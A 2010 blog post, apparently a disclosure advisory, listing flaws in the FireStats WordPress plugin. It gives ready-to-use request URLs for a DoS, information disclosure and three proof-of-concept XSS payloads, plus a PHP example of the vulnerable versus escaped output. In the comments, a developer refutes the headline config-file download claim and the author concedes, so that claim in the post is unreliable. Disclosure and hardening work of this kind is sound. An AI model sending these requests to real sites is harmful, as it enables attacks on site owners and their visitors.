More 0day WordPress security leaks in FireStats!
I just tried to find more security leaks in the FireStats plugin; I was specifically searching for remotely exploitable problems.
The result: seven fresh security issues.
1x DoS:
/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1

1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host):
/wp-content/plugins/firestats/php/tools/get_config.php

2x information disclosure:
/wp-content/plugins/firestats/php/page-sites.php
/wp-content/plugins/firestats/php/page-tools.php

3x XSS:
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=
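The three XSS entries above are all of the reflected kind: a request parameter is written back into the page. The first two payloads land in text context and need only `<script>` to work; the third (`%27%20onmousemove=...`, i.e. `' onmousemove=alert(123); ...`) lands inside a single-quoted attribute, closes it, and adds an event handler without ever using `<` or `>`. That is why escaping angle brackets alone is not a fix. The following is an added illustration, not FireStats' own code: the form markup and the way the `edit` parameter is used are assumed, only the parameter name and the payloads come from the list above.

```php
<?php
// Added example, not FireStats code. Shows the reflected-XSS pattern the
// advisory's payloads exploit, beside a hardened version. The markup and the
// handling of the `edit` parameter are assumptions for illustration.

// --- Vulnerable pattern (what the payloads above rely on) ------------------
function render_ip_form_vulnerable(array $get): string
{
    $edit = $get['edit'] ?? '';
    // Text context: <script>alert(123)</script> is emitted as-is and runs.
    // Attribute context: ' onmousemove=alert(123); a=  closes value='...'
    // and injects an event handler; no angle brackets are needed.
    return "<h2>Edit excluded IP: {$edit}</h2>\n"
         . "<input type='text' name='ip' value='{$edit}'>\n";
}

// --- Hardened pattern -----------------------------------------------------
function esc_html(string $s): string
{
    // ENT_QUOTES encodes both ' and ". Plain htmlspecialchars() leaves the
    // single quote alone, which is exactly what the third payload abuses.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_ip_form_hardened(array $get): string
{
    $edit = $get['edit'] ?? '';
    $safe = esc_html($edit);
    return "<h2>Edit excluded IP: {$safe}</h2>\n"
         . "<input type='text' name='ip' value='{$safe}'>\n";
}

// Demo with the advisory's two payload shapes, URL-decoded.
$text_ctx = '<script>alert(123)</script>';
$attr_ctx = "' onmousemove=alert(123); style=width:900;height:900; a=";

echo "--- vulnerable ---\n";
echo render_ip_form_vulnerable(['edit' => $text_ctx]);
echo render_ip_form_vulnerable(['edit' => $attr_ctx]);

echo "--- hardened ---\n";
echo render_ip_form_hardened(['edit' => $text_ctx]);
echo render_ip_form_hardened(['edit' => $attr_ctx]);
```

In the hardened output the quote becomes `&#039;` and stays inside the attribute value, so the `onmousemove` never becomes an attribute of its own. Escaping at output time is the minimum; on a page that edits an excluded IP, rejecting anything that is not a valid address before it is reflected at all (for example with `filter_var($edit, FILTER_VALIDATE_IP)`) is a sensible second layer.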
Let's hope they patch soon, because we are running FireStats too. The previous fix came very fast, so I assume they will fix it quickly this time as well.
Oh, and feel free to test the exploits against this site (but please don't try out the DoS).
Good luck Firestats team with fixing these vulnerabilities!
This entry was posted by Jelmer de Hen on 09/07/2010 at 8:28 pm, and is filed under Critical, Web Security.
about 2 days ago
Nice find. Hope they fix it soon.
about 1 day ago
The most significant thing is of course the configuration file download; however, it's totally false.
See if you can get my config file from here:
http://admin.firestats.cc/firestats/php/tools/get_config.php
This PHP script is designed to generate a config file on demand, not to give the current one.
For instance, here is the config file of Bill Gates:
http://admin.firestats.cc/firestats/php/tools/get_config.php?user=Bill%20Gates&pass=secret!
about 1 day ago
You are right; I looked at the code but I could not find anything worthy.
Why would you have this function in FireStats? It's pretty pointless, I think.